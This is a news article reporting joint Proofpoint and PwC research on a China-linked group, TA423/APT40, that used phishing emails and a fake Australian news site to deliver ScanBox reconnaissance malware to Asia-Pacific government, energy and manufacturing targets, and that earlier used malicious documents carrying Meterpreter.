A Chinese-based cyberespionage group targeted Australian officials with reconnaissance malware to siphon off details about the victims hackers could use to execute more targeted strikes, researchers with cybersecurity firm Proofpoint and the PwC Threat Intelligence team said in joint research published Tuesday.
The cyberespionage campaign that focused on government, energy and manufacturing personnel in the Asia-Pacific region deployed phishing emails directing targets to a fake news outlet, the researchers said. The attackers — referred to as both TA423, Red Landon and APT40 — designed the site to deliver malware known as ScanBox.
The Chinese-based group has been active for nearly a decade, dating back to 2013, with a primary focus on the South China Sea, but known to have victims across the globe. In 2021, the Department of Justice tied APT40 to China’s Ministry of State Security.
In this latest campaign that took place between April and June, the hacking group appeared to focus on global heavy industry manufacturers that conduct maintenance of fleets of wind turbines in the South China Sea.
The phony “Australian Morning News” news site contained images and stories lifted from legitimate news organizations, the researchers said. A previous operation believed to be associated with the Chinese cyberespionage group, in 2018, targeted Cambodia in much the same way.
With subject lines such as “Sick Leave,” “User Research” and “Request Cooperation,” the phishing emails explained that the sender was starting a “humble news website” and wanted feedback.
The ScanBox the hackers intended to deploy on victims’ machines dates back to at least 2014. It allows attackers to log keystrokes and to collect a range of information about victims to better calibrate future exploitation, such as software versions and configurations, operating system details, browser versions.
A 2015 PwC analysis concluded that numerous China-linked cyber operations have used the tool over several years. In February 2021, for instance, Proofpoint observed another Chinese-aligned group, TA413, using it to target Tibetan organizations globally.
Analysis of the latest operation showed links to earlier activity from the group dating back to March 2021, the researchers found. Phishing emails sent between March 2021 and September 2021 used malicious RTF files to deliver Meterpreter, malware within the Metasploit framework that allows an attacker to run commands on a victim computer.
In March 2022, the operation picked up again using a malicious Microsoft Word document, and then the current wave began in April using domains leading victims to the phony news website.